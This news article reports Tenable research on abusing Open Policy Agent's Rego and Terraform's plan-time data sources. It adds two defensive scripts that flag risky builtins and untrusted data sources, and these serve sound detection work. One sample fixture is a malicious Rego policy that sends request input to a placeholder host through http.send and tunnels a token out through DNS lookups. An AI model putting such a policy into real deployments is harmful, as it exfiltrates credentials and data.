Cybersecurity researchers have disclosed two new attack techniques against infrastructure-as-code (IaC) and policy-as-code (PaC) tools like HashiCorp's Terraform and Open Policy Agent (OPA) that leverage dedicated, domain-specific languages (DSLs) to breach cloud platforms and exfiltrate data.
"Since these are hardened languages with limited capabilities, they're supposed to be more secure than standard programming languages – and indeed they are," Tenable senior security researcher Shelly Raban said in a technical report published last week. "However, more secure does not mean bulletproof."
OPA is a popular, open-source policy engine that allows organizations to enforce policies across cloud-native environments, such as microservices, CI/CD pipelines, and Kubernetes. Policies are defined using a native query language called Rego, which is then evaluated by OPA to return a decision.
The attack method devised by Tenable targets the supply chain, wherein an attacker gains unauthorized access via a compromised access key to insert a malicious Rego policy into an OPA server, which is subsequently used during the policy decision phase to allow malicious actions like credential exfiltration using a built-in function known as "http.send."
Even in instances where an OPA deployment restricts the use of http.send, the cybersecurity firm found that it's possible to utilize another function named "net.lookup_ip_addr" to smuggle the data using DNS lookups via a technique called DNS tunneling.
"So, the net.lookup_ip_addr function is another function you may consider restricting or at least looking for in policies, as it also introduces the risk of data exfiltration from your OPA deployment," Raban said.
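The "look for in policies" advice above can be automated as a pre-deployment check. The script below is an added example written for this article; it is not Tenable's code and not part of OPA. It scans Rego source text for calls to the two builtins the article names (http.send and net.lookup_ip_addr), ignores commented-out code, and returns a pass/fail result suitable for a CI gate. The sample policies, hostnames and file names are constructed for the example.

```python
"""Flag risky network builtins in Rego policies before they reach an OPA server.

Added example for the OPA section of the article; not Tenable's code and not
part of OPA. Assumes policies are available as plain Rego source text; the
builtins checked are the two the article names.
"""
import re

# Builtins that can move data off the OPA host (both named in the article).
RISKY_BUILTINS = {
    "http.send": "outbound HTTP request; can carry input or data to an external host",
    "net.lookup_ip_addr": "DNS resolution; can tunnel data out inside crafted hostnames",
}

# Matches a call such as `http.send(` or `net.lookup_ip_addr (`.
_CALL_RE = re.compile(
    r"\b(" + "|".join(re.escape(b) for b in RISKY_BUILTINS) + r")\s*\("
)


def strip_comments(src):
    """Remove Rego `#` comments, but leave `#` characters inside strings alone."""
    out = []
    for line in src.splitlines():
        in_str, cut = False, len(line)
        for i, ch in enumerate(line):
            if ch == '"' and (i == 0 or line[i - 1] != "\\"):
                in_str = not in_str
            elif ch == "#" and not in_str:
                cut = i
                break
        out.append(line[:cut])
    return "\n".join(out)


def find_risky_calls(policy_name, src):
    """Return one finding per risky builtin call, with the 1-based line number."""
    findings = []
    for lineno, line in enumerate(strip_comments(src).splitlines(), start=1):
        for m in _CALL_RE.finditer(line):
            name = m.group(1)
            findings.append({"policy": policy_name, "line": lineno,
                             "builtin": name, "why": RISKY_BUILTINS[name]})
    return findings


# Constructed sample policies (not from the article).
SAMPLE_POLICIES = {
    "authz.rego": """
package authz

# http.send is deliberately not used here; a comment must not trigger a finding.
default allow := false

allow if {
    input.user.role == "admin"
}
""",
    "suspicious.rego": """
package authz

allow if {
    # Looks like an ordinary rule but also posts the request to an outside host.
    resp := http.send({"method": "POST", "url": "https://example.invalid/collect", "body": input})
    resp.status_code == 200
}

leak if {
    # Pushes data into a hostname and resolves it: the DNS-tunneling path.
    net.lookup_ip_addr(sprintf("%s.example.invalid", [input.token]))
}
""",
}


def scan_all(policies=SAMPLE_POLICIES):
    """Scan every policy in a name -> source mapping."""
    findings = []
    for name, src in policies.items():
        findings.extend(find_risky_calls(name, src))
    return findings


def gate(policies=SAMPLE_POLICIES):
    """CI gate: True only when no policy calls a risky builtin."""
    return not scan_all(policies)


if __name__ == "__main__":
    for f in scan_all():
        print(f"{f['policy']}:{f['line']}: {f['builtin']} - {f['why']}")
    print("PASS" if gate() else "FAIL")
```

A scan like this is a detection aid, not an enforcement boundary: the enforcement counterpart is OPA's capabilities file, which lists the builtins a policy may use, so a deployment that leaves http.send and net.lookup_ip_addr out of that list rejects such policies at compile time rather than relying on a text search.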
Terraform, similar to OPA, aims to simplify the process of setting up, deploying, and managing cloud resources via code-based definitions. These configurations can be set up using another declarative DSL called HashiCorp Configuration Language (HCL).
An attacker could target the open-source IaC platform by taking advantage of its "terraform plan" command, which is typically triggered as part of GitHub "pull_request" workflows, to execute unreviewed changes containing a malicious data source during the CI/CD process.
"This poses a risk, as an external attacker in a public repository or a malicious insider (or an external attacker with a foothold) in a private repository could exploit a pull request for their malicious objectives," Tenable noted. "Data sources run during 'terraform plan,' which significantly lowers the entry point for attackers."
These data sources, in turn, could be a rogue external data source, a Terraform module, or a DNS data source, necessitating that only third-party components from trusted sources be used. Some of the other recommendations to mitigate such risks include:
- Implement granular role-based access control (RBAC) and follow the principle of least privilege
- Set up application-level and cloud-level logging for monitoring and analysis
- Limit the network and data access of the applications and the underlying machines
- Prevent automatic execution of unreviewed and potentially malicious code in CI/CD pipelines
Furthermore, organizations can use IaC scanning tools and solutions like Terrascan and Checkov to preemptively identify misconfigurations and compliance issues prior to deployment.
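The Terraform risk above comes down to what a pull request can make `terraform plan` evaluate. The following pre-plan gate is an added example written for this article; it is not Tenable's, HashiCorp's, Terrascan's or Checkov's code. It walks HCL text and flags the data source kinds the article names (the "external" data source, which runs a program, and "dns_*" data sources, which resolve names) together with any module whose source lies outside a trusted registry namespace, so a CI job can refuse to plan the change before any data source runs. The trusted namespace, sample configuration and hostnames are constructed placeholders.

```python
"""Pre-plan gate for Terraform: refuse to run `terraform plan` on a change that
declares code-executing or network-reaching data sources, or that pulls modules
from outside a trusted registry namespace.

Added example for the Terraform section of the article; not Tenable's,
HashiCorp's, Terrascan's or Checkov's code. Assumes plain HCL text with the
usual one-line block headers; the trusted namespace is a constructed placeholder.
"""
import re

# Data source types that run a program or reach the network during plan.
# `external` and the `dns_*` sources are the kinds the article names.
RISKY_DATA_TYPES = {"external"}
RISKY_DATA_PREFIXES = ("dns_",)

# Constructed allowlist of module source prefixes (assumed private registry namespace).
TRUSTED_MODULE_PREFIXES = ("app.terraform.io/example-org/",)

_DATA_RE = re.compile(r'^\s*data\s+"([^"]+)"\s+"([^"]+)"\s*\{')
_MODULE_RE = re.compile(r'^\s*module\s+"([^"]+)"\s*\{')
_SOURCE_RE = re.compile(r'^\s*source\s*=\s*"([^"]+)"')


def _brace_delta(line):
    """Net change in block depth on this line, ignoring braces inside strings."""
    depth, in_str = 0, False
    for i, ch in enumerate(line):
        if ch == '"' and (i == 0 or line[i - 1] != "\\"):
            in_str = not in_str
        elif not in_str and ch == "{":
            depth += 1
        elif not in_str and ch == "}":
            depth -= 1
    return depth


def find_untrusted(path, hcl):
    """Return findings for risky data sources and non-allowlisted module sources."""
    findings = []
    depth = 0
    module = None  # name of the top-level module block we are inside, if any
    for lineno, line in enumerate(hcl.splitlines(), start=1):
        if line.lstrip().startswith(("#", "//")):
            continue  # full-line comment: no block structure on it
        if depth == 0:
            m = _DATA_RE.match(line)
            if m:
                dtype = m.group(1)
                if dtype in RISKY_DATA_TYPES or dtype.startswith(RISKY_DATA_PREFIXES):
                    findings.append({"file": path, "line": lineno, "kind": "data",
                                     "name": f"{dtype}.{m.group(2)}",
                                     "why": "runs a program or reaches the network during plan"})
            m = _MODULE_RE.match(line)
            if m:
                module = m.group(1)
        elif module and depth == 1:
            m = _SOURCE_RE.match(line)
            if m and not m.group(1).startswith(TRUSTED_MODULE_PREFIXES):
                findings.append({"file": path, "line": lineno, "kind": "module",
                                 "name": module,
                                 "why": f"source {m.group(1)!r} is outside the trusted namespace"})
        depth += _brace_delta(line)
        if depth == 0:
            module = None
    return findings


def plan_allowed(path, hcl):
    """CI gate: True only when the configuration produced no findings."""
    return not find_untrusted(path, hcl)


# Constructed sample configuration (not from the article).
SAMPLE_HCL = '''
terraform {
  required_version = ">= 1.5"
}

# Trusted: module from the organisation's private registry namespace.
module "network" {
  source  = "app.terraform.io/example-org/network/aws"
  version = "1.2.0"
}

# Untrusted: module fetched straight from an arbitrary git host.
module "helper" {
  source = "git::https://example.invalid/someone/terraform-helper.git"
}

# Runs a program on the CI runner as soon as `terraform plan` evaluates it.
data "external" "lookup" {
  program = ["./scripts/lookup.sh"]
}

# Resolves a name during plan; the query itself leaves the runner.
data "dns_a_record_set" "api" {
  host = "api.example.invalid"
}

# Ordinary provider data source: not flagged.
data "aws_caller_identity" "current" {}
'''

if __name__ == "__main__":
    for f in find_untrusted("main.tf", SAMPLE_HCL):
        print(f"{f['file']}:{f['line']}: {f['kind']} {f['name']} - {f['why']}")
    print("PLAN ALLOWED" if plan_allowed("main.tf", SAMPLE_HCL) else "PLAN BLOCKED")
```

Run this in the pull-request job before the plan step and fail the job on any finding; combined with a workflow that does not plan unreviewed changes from forks automatically, it closes the path the article describes without waiting for a full scanner run.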